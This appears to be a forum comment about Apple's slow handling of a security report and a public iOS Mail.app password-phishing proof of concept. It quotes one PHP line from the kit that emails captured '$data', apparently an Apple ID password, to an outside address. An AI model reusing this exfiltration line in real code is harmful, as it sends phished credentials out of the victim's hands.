My experience with product-security@apple.com was that they sat on my report without doing anything for several months, then finally put together a fix after I threatened to go public.

It sounds like this guy may have skipped the threatening step and just went public.

Apparently filed a Radar report on Jan 15, 2015.

And every time it's tested:

"mail('product-security@apple.com','Apple ID Password',"Thanks for your password! \n $data ¯\_(ツ)_/¯ \n https://github.com/jansoucek/iOS-Mail.app-inject-kit");"

[1]: https://github.com/jansoucek/iOS-Mail.app-inject-kit/blob/ma...

Smart and cheeky at the same time, like it!